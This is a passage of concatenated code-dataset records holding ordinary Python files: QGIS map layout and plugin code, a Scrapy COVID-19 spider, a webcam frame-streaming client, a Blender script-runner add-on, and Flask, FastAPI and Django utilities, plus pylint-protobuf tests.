QgsLayerTree()\r\nfor layer in layersToAdd:\r\n #add layer objects to the layer tree\r\n root.addLayer(layer)\r\n\r\n\r\n\r\nlegend = QgsLayoutItemLegend(layout)\r\nlegend.model().setRootGroup(root)\r\nlayout.addLayoutItem(legend)\r\nlegend.attemptMove(QgsLayoutPoint(240, 35, QgsUnitTypes.LayoutMillimeters))\r\n\r\ntitle = QgsLayoutItemLabel(layout)\r\ntitle.setText(\"Prehistoric archaeological sites on Unst, Shetland, Scotland\")\r\ntitle.setFont(QFont(\"Arial\", 28))\r\ntitle.adjustSizeToText()\r\nlayout.addLayoutItem(title)\r\ntitle.attemptMove(QgsLayoutPoint(10, 4, QgsUnitTypes.LayoutMillimeters))\r\n\r\nsubtitle = QgsLayoutItemLabel(layout)\r\nsubtitle.setText(\"Archaeological data courtesy of the CANMORE repository\")\r\nsubtitle.setFont(QFont(\"Arial\", 17))\r\nsubtitle.adjustSizeToText()\r\nlayout.addLayoutItem(subtitle)\r\nsubtitle.attemptMove(QgsLayoutPoint(11, 20, QgsUnitTypes.LayoutMillimeters)) #allows moving text box\r\n\r\ncredit_text = QgsLayoutItemLabel(layout)\r\ncredit_text.setText(\"Map created by A. Prentice 2019\")\r\ncredit_text.setFont(QFont(\"Arial\", 10))\r\ncredit_text.adjustSizeToText()\r\nlayout.addLayoutItem(credit_text)\r\ncredit_text.attemptMove(QgsLayoutPoint(225, 185, QgsUnitTypes.LayoutMillimeters))\r\n\r\n# add scalebar\r\nscaleBar = QgsLayoutItemScaleBar(layout)\r\nscaleBar.setLinkedMap(map)\r\nscaleBar.applyDefaultSettings()\r\nscaleBar.applyDefaultSize()\r\n# scaleBar.setStyle('Line Ticks Down') \r\nscaleBar.setNumberOfSegmentsLeft(0)\r\nscaleBar.setNumberOfSegments (3)\r\n\r\nscaleBar.setPos(225, 165)\r\nscaleBar.update()\r\n\r\nlayout.addItem(scaleBar)\r\n\r\n#Add north arrow\r\narrow = QgsLayoutItemPicture(layout)\r\narrow.setPicturePath(\"C:/OSGeo4W64/apps/qgis/svg/arrows/NorthArrow_04.svg\")\r\narrow.setLinkedMap(map)\r\narrow.attemptMove(QgsLayoutPoint(225, 135, QgsUnitTypes.LayoutMillimeters))\r\narrow.attemptResize(QgsLayoutSize(20, 20, QgsUnitTypes.LayoutMillimeters))\r\nlayout.addItem(arrow)\r\n\r\nQgsLayoutExporter(layout).exportToPdf( 'C:/Users/ADMIN/Desktop/Data/geoprogramming/archaeo_sites.pdf', QgsLayoutExporter.PdfExportSettings() )\r\n# this exports the map as an image\r\nQgsLayoutExporter(layout).exportToImage('C:/Users/ADMIN/Desktop/Data/geoprogramming/archaeo_sites.png', QgsLayoutExporter.ImageExportSettings())","sub_path":"map_creation.py","file_name":"map_creation.py","file_ext":"py","file_size_in_byte":9588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"414405658","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom covid19.items import TestingStats\nfrom datetime import datetime as dt\nimport logging\n\n# Deprecated: No longer reporting negative tests.\nclass FloridaSpider(scrapy.Spider):\n name = 'florida'\n allowed_domains = ['http://www.floridahealth.gov/']\n names = [\"Florida State\"]\n case_categories = [\"positive\", \"negative\", \"pending\", \"pui\"]\n custom_settings = {\"LOG_LEVEL\" : logging.ERROR }\n\n def start_requests( self ):\n yield scrapy.Request( \"http://www.floridahealth.gov/diseases-and-conditions/COVID-19/\", callback=self.parse )\n\n def parse(self, response):\n item = TestingStats()\n\n #date = response.xpath( '/html/body/div[1]/div[3]/div/div[2]/div[3]/div/div[1]/block/p[1]/sup/text()' ).get()\n date = response.xpath( '/html/body/div[2]/div/div/div[3]/div[1]/p/text()' ).get()\n date = date.replace( \".\", \"\" ).split( \"of \" )[-1]\n date = dt.strptime( date, \"%I:%M %p ET %m/%d/%Y\")\n\n positive = response.xpath( '/html/body/div[2]/div/div/div[3]/div[2]/div[1]/div/div[1]/h2/text()' ).get()\n positive = positive.split( \" \" )[0]\n\n negative = response.xpath( '/html/body/div[1]/div[3]/div/div[2]/div[3]/div/div[1]/block/div[5]/text()' ).get()\n\n pending = response.xpath( '/html/body/div[1]/div[3]/div/div[2]/div[3]/div/div[1]/block/div[6]/text()' ).get()\n\n deaths = response.xpath( '/html/body/div[2]/div/div/div[3]/div[4]/div/table/tbody/tr[2]/td[2]/text()' ).get()\n\n item[\"date\"] = date.strftime(\"%Y-%m-%d %H:%M %p\")\n item[\"name\"] = \"Florida\",\n item[\"positive\"] = positive\n item[\"pending\"] = pending\n item[\"negative\"] = negative\n\n print( item.toAsciiTable() )\n return item\n\n","sub_path":"covid19/spiders/usa/florida.py","file_name":"florida.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"53061428","text":"import cv2\nimport numpy as np\nimport socket\nimport struct\nfrom io import BytesIO\nfrom datetime import datetime\n\n# Capture frame\ncap = cv2.VideoCapture(0)\n\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient_socket.connect(('10.0.0.220', 8080))\n\nprint(\"connected\")\n\nsend_delta = 1/30\nlast_sent = datetime.now()\nwhile cap.isOpened():\n if (datetime.now() - last_sent).total_seconds() > send_delta:\n _, frame = cap.read()\n\n target_w = 400\n target_h = target_w // 16 * 10\n frame = cv2.resize(frame, (target_w, target_h))\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n memfile = BytesIO()\n np.savez_compressed(memfile, frame=frame)\n memfile.seek(0)\n data = memfile.read()\n\n last_sent = datetime.now()\n # Send form byte array: frame size + frame content\n client_socket.sendall(struct.pack(\"L\", len(data)) + data)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"503701064","text":"\nbl_info = {\n \"name\": \"BpyList\",\n \"description\": \"bpylist\",\n \"author\": \"solpie\",\n \"version\": (0, 0, 2),\n \"blender\": (2, 80, 0),\n \"location\": \"View 3D > Header\",\n # \"wiki_url\": \"http://docs.retopoflow.com\",\n \"category\": \"3D View\"\n}\nimport bpy\nfrom bpy.types import Menu, Operator, Panel,UIList\nfrom bpy.props import StringProperty, IntProperty, BoolProperty\nimport os\n\nclass BpyList_Prefs(bpy.types.AddonPreferences):\n bl_idname = __package__\n bpypath = StringProperty(\n name=\"tmp path\",\n default='F:\\\\projects\\\\BlendExec\\\\bpy_scripts',\n description=\"tmp bpy.py write path\",\n )\n\n def draw(self, context):\n layout = self.layout\n layout.label(text=\"set bpy dir\")\n layout.prop(self, \"bpypath\")\n # layout.label(text=\"set port\")\n # layout.prop(self, \"port\")\n\nclass BpyList_Refresh(Operator):\n bl_idname = 'bpylist.refresh'\n bl_label = 'open bpylist dir'\n bl_description = 'refresh bpylist dir add to list'\n\n def execute(self, context):\n addon_prefs = context.preferences.addons[__package__].preferences\n tmp_path = addon_prefs.bpypath\n os.system('explorer ' + tmp_path)\n unregister()\n register()\n return {'PASS_THROUGH'}\n\nclass BpyList_Run(Operator):\n bl_idname = 'bpylist.run'\n bl_label = 'run'\n bl_description = 'run bpyscript'\n filename = bpy.props.StringProperty(default='')\n def execute(self, context):\n print(self.filename)\n bpypath = self.filename\n with open(bpypath, 'r+') as f:\n bpy_text = f.read()\n print('BlenCall')\n if '#[as_module]' in bpy_text:\n print('as_module')\n if len(bpy_text):\n if 'exec' not in bpy.data.texts:\n bpy.data.texts.new('exec')\n bpy.data.texts['exec'].from_string(bpy_text)\n bpy.data.texts['exec'].as_module()\n bpy.data.texts['exec'].from_string('')\n else:\n print('no bpy')\n else:\n print('exec compile')\n exec(compile(bpy_text, '', 'exec'))\n pass\n f.close()\n return {'FINISHED'}\n\nclass BL_UL_list(UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n layout.label(text=item.name,icon='WORLD_DATA')\n # if item.name == context.scene.world.name:\n # layout.label(text='',icon='CHECKBOX_HLT')\n # layout.operator('bp_world.delete_world',icon='X',text=\"\",emboss=False).world_name = item.name\n\nclass VIEW3D_PT_BpyList(Panel):\n \"\"\"BpyList Blender Menu\"\"\"\n bl_label = \"BpyList\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'HEADER'\n\n @staticmethod\n def is_editing_target(context):\n obj = context.active_object\n mode_string = context.mode\n edit_object = context.edit_object\n gp_edit = obj and obj.mode in {'EDIT_GPENCIL', 'PAINT_GPENCIL', 'SCULPT_GPENCIL', 'WEIGHT_GPENCIL'}\n return not gp_edit and edit_object and mode_string == 'EDIT_MESH'\n\n def draw(self, context):\n layout = self.layout\n layout.label(text='BpyList')\n addon_prefs = context.preferences.addons[__package__].preferences\n location = addon_prefs.bpypath\n # r=>root, d=>directories, f=>files\n i = 0\n box = layout.box()\n for r, d, f in os.walk(location):\n for item in f:\n if '.py' in item:\n filename_1 = os.path.join(r, item)\n with open(filename_1, 'r+') as f:\n line_1 = f.readline()\n f.close()\n if '#[as_exec]' not in line_1 and '#[as_module]' not in line_1:\n continue\n i += 1\n # files_in_dir.append({\"name\":item,\"path\":os.path.join(r, item),\"idx\":i})\n row = box.row()\n op = row.operator('bpylist.run',text=\"\",icon='RADIOBUT_ON')\n op.filename = os.path.join(r, item)\n row.label(text=item)\n # layout.label(text=\"\",icon=sel_icon)\n # layout.template_list(\"BP_UL_worlds\", \"\", bpy.data, \"worlds\", scene.bp_props, \"selected_world_index\", rows=4)\n # layout.template_list(\"BL_UL_list\", \"\", files_in_dir,'name',rows=4)\n\n layout.separator()\n layout.label(text='BpyList Updater')\n col = layout.column()\n col.operator('bpylist.refresh')\n\n #############################################################################\n # the following two methods add/remove RF to/from the main 3D View menu\n # NOTE: this is a total hack: hijacked the draw function!\n @staticmethod\n def menu_add():\n # for more icon options, see:\n # https://docs.blender.org/api/current/bpy.types.UILayout.html#bpy.types.UILayout.operator\n VIEW3D_PT_BpyList.menu_remove()\n VIEW3D_PT_BpyList._menu_original = bpy.types.VIEW3D_MT_editor_menus.draw_collapsible\n def hijacked(context, layout):\n obj = context.active_object\n mode_string = context.mode\n edit_object = context.edit_object\n gp_edit = obj and obj.mode in {'EDIT_GPENCIL', 'PAINT_GPENCIL', 'SCULPT_GPENCIL', 'WEIGHT_GPENCIL'}\n\n VIEW3D_PT_BpyList._menu_original(context, layout)\n\n row = layout.row(align=True)\n row.popover(panel=\"VIEW3D_PT_BpyList\", text=\"BpyList\")\n row.operator('bpylist.refresh', text=\"\", icon='QUESTION')\n bpy.types.VIEW3D_MT_editor_menus.draw_collapsible = hijacked\n @staticmethod\n def menu_remove():\n if not hasattr(VIEW3D_PT_BpyList, '_menu_original'): return\n bpy.types.VIEW3D_MT_editor_menus.draw_collapsible = VIEW3D_PT_BpyList._menu_original\n del VIEW3D_PT_BpyList._menu_original\n\n# registration\nclasses = [\n VIEW3D_PT_BpyList,\n BpyList_Prefs,\n BpyList_Refresh,\n BL_UL_list,\n BpyList_Run,\n] \n\ndef register():\n for cls in classes: bpy.utils.register_class(cls)\n VIEW3D_PT_BpyList.menu_add()\n\ndef unregister():\n VIEW3D_PT_BpyList.menu_remove()\n for cls in reversed(classes): bpy.utils.unregister_class(cls)\n\nif __name__ == \"__main__\":\n register()\n","sub_path":"addons/BpyList/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"245071268","text":"from flask import Blueprint\n\nfrom ..logs.models import Level\n\n\nmain = Blueprint('main', __name__)\n\n\n@main.app_context_processor\ndef inject_levels():\n def create_level(level):\n if level & Level.DEBUG:\n return 'info'\n elif level & Level.INFO:\n return 'success'\n elif level & Level.WARNING:\n return 'warning'\n elif level & Level.ERROR:\n return 'danger'\n elif level & Level.CRITICAL:\n return 'danger'\n return dict(create_level=create_level)\n\n\nfrom . import views, errors","sub_path":"app/main/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"374446567","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n VigourmapsDialog\n A QGIS plugin\n This plugin allows to obtain the biomass in rocky beach\n Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/\n -------------------\n begin : 2020-09-23\n git sha : $Format:%H$\n copyright : (C) 2020 by Projeto SWAV\n email : liaduarte@fc.up.pt\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n\"\"\"\n\nimport os\n\nfrom qgis.PyQt import uic\nfrom qgis.PyQt import QtWidgets\nfrom qgis.core import *\nfrom qgis.gui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom qgis.core import *\nfrom qgis.utils import *\nfrom qgis.core import Qgis\n\n# This loads your .ui file so that PyQt can populate your plugin with the elements from Qt Designer\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\n os.path.dirname(__file__), 'vigour_maps_dialog_base.ui'))\n\n\nclass VigourMapsDialog(QtWidgets.QDialog, FORM_CLASS):\n def __init__(self, parent=None):\n \"\"\"Constructor.\"\"\"\n super(VigourMapsDialog, self).__init__(parent)\n # Set up the user interface from Designer through FORM_CLASS.\n # After self.setupUi() you can access any designer object by doing\n # self., and you can use autoconnect slots - see\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\n # #widgets-and-dialogs-with-auto-connect\n self.setupUi(self)\n self.widget.show()\n self.widget.setCanvasColor(Qt.white)\n self.widget.enableAntiAliasing(True)\n\n\nclass RectangleMapTool(QgsMapToolEmitPoint):\n rect_created = pyqtSignal(QgsRectangle)\n def __init__(self, canvas):\n self.canvas = canvas\n QgsMapToolEmitPoint.__init__(self, self.canvas)\n self.rubberBand = QgsRubberBand(self.canvas, True)\n self.rubberBand.setColor(Qt.red)\n self.rubberBand.setWidth(1)\n\n self.points = []\n self.finished = False\n self.poly_bbox = False\n self.double_click_flag = False\n\n\n self.reset()\n\n def reset(self):\n #self.startPoint = self.endPoint = None\n #self.isEmittingPoint = False\n self.rubberBand.reset(True)\n self.poly_bbox = False\n self.points.clear()\n\n #new\n def keyPressEvent(self,e):\n #pressing escape resets the canvas. pressing enter connects the polygon\n if (e.key()==16777216):\n self.reset()\n if (e.key()==16777220):\n self.finishPolygon()\n\n #new\n def canvasDoubleClickEvent(self,e):\n #finishes the polygon on double click\n self.double_click_flag = True\n self.finishPolygon()\n\n # def canvasPressEvent(self, e):\n # self.startPoint = self.toMapCoordinates(e.pos())\n # self.endPoint = self.startPoint\n # self.isEmittingPoint = True\n # self.showRect(self.startPoint, self.endPoint)\n\n def canvasReleaseEvent(self, e):\n #activated when user clicks on the canvas. gets coordinates, draws them on the map and adds to the list of points\n if self.double_click_flag:\n self.double_click_flag = False\n return\n\n #if the finished flag is activated, the canvas will be reset for a new polygon\n if self.finished:\n self.reset()\n self.finished = False\n\n self.click_point = self.toMapCoordinates(e.pos())\n\n self.rubberBand.addPoint(self.click_point, True)\n self.points.append(self.click_point)\n self.rubberBand.show()\n\n def finishPolygon(self):\n # Activated by user or when the map window is closed without connecting\n # the polygon. Makes the polygon valid by making first and last point\n # the same. This is reflected visually. Up until now the user has been\n # drawing a line: a polygon is created and shown on the map\n # nothing will happen if the code below has already been ran\n if self.finished:\n return\n\n # connecting the polygon is valid if there's already at least 3 points\n elif len(self.points)>2:\n first_point = self.points[0]\n self.points.append(first_point)\n self.rubberBand.closePoints()\n self.rubberBand.addPoint(first_point, True)\n self.finished = True\n # a polygon is created and added to the map for visual purposes\n map_polygon = QgsGeometry.fromPolygonXY([self.points])\n self.rubberBand.setToGeometry(map_polygon)\n # get the bounding box of this new polygon\n self.poly_bbox = self.rubberBand.asGeometry().boundingBox()\n else:\n self.finished = True\n\n def getPoints(self):\n # Returns list of PointXY geometries, i.e. the polygon in list form\n self.rubberBand.reset(True)\n return self.points\n\n # self.isEmittingPoint = False\n # r = self.rectangle()\n # if r is not None:\n # self.rect_created.emit(r)\n #QMessageBox.about(self.dlg, \"teste\", str('ola'))\n # print(\"Rectangle:\", r.xMinimum(),\n # r.yMinimum(), r.xMaximum(), r.yMaximum()\n # )\n #\n # def canvasMoveEvent(self, e):\n # if not self.isEmittingPoint:\n # return\n #\n # self.endPoint = self.toMapCoordinates(e.pos())\n #\n # self.showRect(self.startPoint, self.endPoint)\n #\n # def showRect(self, startPoint, endPoint):\n # self.rubberBand.reset()\n # if startPoint.x() == endPoint.x() or startPoint.y() == endPoint.y():\n # return\n #\n # point1 = QgsPointXY(startPoint.x(), startPoint.y())\n # point2 = QgsPointXY(startPoint.x(), endPoint.y())\n # point3 = QgsPointXY(endPoint.x(), endPoint.y())\n # point4 = QgsPointXY(endPoint.x(), startPoint.y())\n # point5 = point1\n #\n # self.rubberBand.addPoint(point1, False)\n # self.rubberBand.addPoint(point2, False)\n # self.rubberBand.addPoint(point3, False)\n # self.rubberBand.addPoint(point4, False)\n # self.rubberBand.addPoint(point5, True)\n # # true to update canvas\n # self.rubberBand.show()\n #\n #\n # def rectangle(self):\n # if self.startPoint is None or self.endPoint is None:\n # return None\n # elif (self.startPoint.x() == self.endPoint.x() or \\\n # self.startPoint.y() == self.endPoint.y()):\n # return None\n #\n # return QgsRectangle(self.startPoint, self.endPoint)\n #\n #\n # def deactivate(self):\n # QgsMapTool.deactivate(self)\n # self.deactivated.emit()\n","sub_path":"vigour_maps_dialog.py","file_name":"vigour_maps_dialog.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"522921141","text":"from .helper import BoundPoint, build_using_optimal_stacking_bounds, build_stacks, get_products_total_volume\n\n\nclass CageException(Exception):\n pass\n\n\nclass Cage:\n Height = 1603\n Width = 697 # Only for reference, not related to orientation\n Length = 846 # Only for reference, not related to orientation\n\n TotalVolume = (Height * Length * Width)\n\n def __init__(self):\n \"\"\"\n Initialise Cage\n \"\"\"\n\n self.orientated_base = None # Set this when the optimal base orientation is found\n self.zones_filled = 0 # Zones that are filled\n self.stacks = []\n self.used_volume = 0\n\n self.used_items = []\n self.remaining_items = []\n\n def _fill_zones(self, product_items: list, free_bounds: list):\n\n # Get optimal orientation\n optimal_info = build_using_optimal_stacking_bounds(product_items, free_bounds)\n\n if not self.orientated_base:\n self.orientated_base = optimal_info[\"bound_point\"] # Set the Cage Orientation (x,y,z)\n\n self.remaining_items = optimal_info[\"remaining_items\"]\n stacked_items = optimal_info[\"stacked_items\"]\n\n self.zones_filled += 1\n stack_zone_info = {\"stack_zone\": self.zones_filled, \"stacked_items\": stacked_items}\n self.stacks.append(stack_zone_info)\n for stack in stacked_items:\n self.used_volume += get_products_total_volume(stack)\n\n def stack_products(self, product_items: list):\n \"\"\"\n Method to stack products\n :param product_items:\n :return:\n \"\"\"\n stacked_items = []\n if self.zones_filled == 0:\n bounds = (BoundPoint(Cage.Width, Cage.Length, Cage.Height),\n BoundPoint(Cage.Length, Cage.Width, Cage.Height),)\n\n self._fill_zones(product_items, bounds)\n\n if len(self.remaining_items) > 0:\n free_bounds = self._get_free_bounding_points(1)\n self._fill_zones(self.remaining_items, free_bounds)\n\n def _get_free_bounding_points(self, zone_no):\n \"\"\"\n This method will return the list of free bounds of the base\n :param zone_no:\n :return: the list of free bounds of the base\n \"\"\"\n if zone_no > 1:\n raise ValueError(\"Zones greater than one are not implemented!\")\n\n zone_one_base_bound_pts = []\n for stack in self.stacks:\n if stack[\"stack_zone\"] == zone_no:\n item_stacks = [stacked_item for stacked_item in stack[\"stacked_items\"]]\n for _stack in item_stacks:\n first_boundpt = next(x['3d_point'] for x in _stack)\n zone_one_base_bound_pts.append(first_boundpt)\n\n free_base_bounds = []\n for i in range(len(zone_one_base_bound_pts)): # Loop through the base bound points\n new_x = self.orientated_base.x - zone_one_base_bound_pts[i].x\n if i == 0:\n new_y = self.orientated_base.y\n else:\n new_y -= zone_one_base_bound_pts[i - 0].y\n free_base_bounds.append(BoundPoint(new_x, new_y, self.orientated_base.z))\n\n return free_base_bounds\n\n @property\n def CageSpaceUtilisation(self):\n if len(self.remaining_items)==0:\n return 100.00 # Cannot use space if no more products left. :)\n else:\n return round((self.used_volume/Cage.TotalVolume)*100,2)","sub_path":"sample/products/caging.py","file_name":"caging.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"447568252","text":"\"\"\"This module provides view functions for projects endpoints.\"\"\"\n\n# pylint: disable=wrong-import-order\n# pylint: disable=ungrouped-imports\n\nfrom fastapi import APIRouter, Form\nfrom http import HTTPStatus\nimport requests\nfrom starlette.responses import JSONResponse\nfrom starlette.requests import Request\nfrom typing import Text\n\nfrom common.utils import error_response\nfrom projects.src.project_management import ProjectManager\nfrom projects.src.utils import log_request\n\nrouter = APIRouter() # pylint: disable=invalid-name\n\n\n@router.get('/projects', tags=['projects'])\ndef list_projects(request: Request) -> JSONResponse:\n \"\"\"Get projects list.\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request)\n\n project_manager = ProjectManager()\n projects = project_manager.list_projects()\n return JSONResponse(projects)\n\n\n@router.post('/projects', tags=['projects'])\ndef create_project(request: Request, name: Text = Form(...),\n description: Text = Form('')) -> JSONResponse:\n \"\"\"Create project.\n Args:\n name {Text}: project name\n description {Text}: project description\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'name': name,\n 'description': description\n })\n\n project_manager = ProjectManager()\n project_id = project_manager.create_project(name, description)\n project = project_manager.get_project(project_id)\n\n return JSONResponse(project, HTTPStatus.CREATED)\n\n\n@router.get('/projects/{project_id}', tags=['projects'])\ndef get_project(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Get project.\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request)\n\n project_manager = ProjectManager()\n project = project_manager.get_project(project_id)\n return JSONResponse(project)\n\n\n@router.put('/projects/{project_id}', tags=['projects'])\ndef update_project(request: Request, project_id: int, name: Text = Form(None),\n description: Text = Form(None)) -> JSONResponse:\n \"\"\"Update project.\n Args:\n project_id {int}: project id\n name {Text}: project name\n description {Text}: project description\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'project_id': project_id,\n 'name': name,\n 'description': description\n })\n\n project_manager = ProjectManager()\n if name is not None:\n project_manager.update_project_name(project_id, name)\n\n if description is not None:\n project_manager.update_project_description(project_id, description)\n\n project = project_manager.get_project(project_id)\n\n return JSONResponse(project)\n\n\n@router.delete('/projects/{project_id}', tags=['projects'])\ndef delete_project(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Delete project.\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'project_id': project_id\n })\n\n project_manager = ProjectManager()\n project = project_manager.get_project(project_id)\n project_manager.terminate(project_id)\n project_manager.delete_project(project_id)\n\n return JSONResponse(project, status_code=HTTPStatus.OK)\n\n\n@router.get('/projects/{project_id}/healthcheck', tags=['projects'])\ndef project_healthcheck(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Get project healthcheck (check if project's tracking server process was started).\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request)\n\n project_manager = ProjectManager()\n project = project_manager.get_project(project_id)\n is_running = project_manager._is_running(project_id)\n\n if is_running:\n return JSONResponse(project, HTTPStatus.OK)\n else:\n return JSONResponse(project, HTTPStatus.BAD_REQUEST)\n\n\n@router.put('/projects/{project_id}/run', tags=['projects'])\ndef run_project(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Run project's tracking server.\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'project_id': project_id\n })\n\n project_manager = ProjectManager()\n running = project_manager.run(project_id)\n\n if not running:\n return error_response(\n http_response_code=HTTPStatus.INTERNAL_SERVER_ERROR,\n message='Internal error, tracking server has terminated'\n )\n\n project = project_manager.get_project(project_id)\n return JSONResponse(project, HTTPStatus.OK)\n\n\n@router.put('/projects/{project_id}/terminate', tags=['projects'])\ndef terminate_project(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Terminate project's tracking server.\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'project_id': project_id\n })\n\n project_manager = ProjectManager()\n project_manager.terminate(project_id)\n project = project_manager.get_project(project_id)\n\n return JSONResponse(project, HTTPStatus.OK)\n\n\n@router.put('/projects/{project_id}/archive', tags=['projects'])\ndef archive(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Archive project.\n Args:\n id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'project_id': project_id\n })\n\n project_manager = ProjectManager()\n project_manager.terminate(project_id)\n project_manager.archive(project_id)\n project = project_manager.get_project(project_id)\n\n return JSONResponse(project, HTTPStatus.OK)\n\n\n@router.put('/projects/{project_id}/restore', tags=['projects'])\ndef restore(request: Request, project_id: int) -> JSONResponse: # pylint: disable=invalid-name,redefined-builtin\n \"\"\"Restore project.\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request, {\n 'project_id': project_id\n })\n\n project_manager = ProjectManager()\n project_manager.restore(project_id)\n project = project_manager.get_project(project_id)\n\n return JSONResponse(project, HTTPStatus.OK)\n\n\n@router.get('/projects/{project_id}/ping', tags=['projects'])\ndef ping(request: Request, project_id: int) -> JSONResponse:\n \"\"\"Ping project's tracking server.\n Args:\n project_id {int}: project id\n Returns:\n starlette.responses.JSONResponse\n \"\"\"\n\n log_request(request)\n\n project_manager = ProjectManager()\n url = project_manager.get_internal_tracking_uri(project_id)\n project = project_manager.get_project(project_id)\n\n try:\n requests.get(url)\n return JSONResponse(project, HTTPStatus.OK)\n except requests.exceptions.ConnectionError:\n return JSONResponse(project, HTTPStatus.BAD_REQUEST)\n","sub_path":"services/projects/src/routers/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"437643484","text":"import os\nimport re\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\n\nfrom text_admin.models import Snippet\n\n\n\nIS_ADDENDUM = r'\\{\\% load addendum_tags \\%\\}'\nSNIPPET_PATTERNS= (\n re.compile(r\"\"\"\\{\\% snippet \\'(?P\\w*:\\w*)\\' \\%\\}(?P.*)\\{\\% endsnippet \\%\\}\"\"\", re.UNICODE),\n re.compile(r\"\"\"\\{\\%snippet \\'(?P\\w*:\\w*)\\' \\%\\}(?P.*)\\{\\% endsnippet\\%\\}\"\"\", re.UNICODE),\n re.compile(r\"\"\"\\{\\% snippet (?P\\w*) \\%\\}(?P.*)\\{\\% endsnippet \\%\\}\"\"\", re.UNICODE),\n re.compile(r\"\"\"\\{\\%snippet (?P\\w*) \\%\\}(?P.*)\\{\\% endsnippet\\%\\}\"\"\", re.UNICODE),\n )\n\n\nclass Command(BaseCommand):\n help = 'Creates snippet instances from templates'\n\n def set_files(self):\n file_list = []\n for dr in settings.TEMPLATE_DIRS:\n for root, subFolders, files in os.walk(dr):\n for file in files:\n file_list.append(os.path.join(root,file))\n self.files = file_list\n\n\n def search_files(self):\n for template in self.files:\n with open(template, 'r') as template:\n data = template.read()\n\n is_addendum = re.search(IS_ADDENDUM, data) # check if the template loads addendum\n if is_addendum:\n for pattern in SNIPPET_PATTERNS:\n snips = [m.groupdict() for m in pattern.finditer(data)]\n if snips:\n self.founds += snips \n\n def handle_results(self):\n for snip in self.founds:\n snip, c = Snippet.objects.get_or_create(\n key = snip['name'],\n defaults={'text':snip['content']}\n )\n\n\n\n def handle(self, *args, **options):\n self.founds = [] # list for storing re.matches\n \n self.set_files()\n self.search_files()\n\n self.handle_results()\n\n\n\n","sub_path":"text_admin/management/commands/makesnippets.py","file_name":"makesnippets.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"428919196","text":"import astroid\nimport pylint.testutils\nimport pytest\n\nimport pylint_protobuf\nfrom conftest import make_message\n\n\ndef test_inline_proto_compilation(proto_builder):\n mod_name = proto_builder(\"\"\"\n message Foo {\n required int32 id = 1;\n }\n \"\"\")\n node = astroid.extract_node(\"\"\"\n import {} as mod\n foo = mod.Person()\n foo.missing = 123\n \"\"\".format(mod_name))\n assert node is not None\n\n\n@pytest.fixture\ndef foo_mod(proto_builder):\n return proto_builder(\"\"\"\n message Foo {\n required int32 id = 1;\n }\n \"\"\", 'foo')\n\n\nclass TestAutoBuilder(pylint.testutils.CheckerTestCase):\n CHECKER_CLASS = pylint_protobuf.ProtobufDescriptorChecker\n\n def test_missing_field(self, foo_mod):\n node = 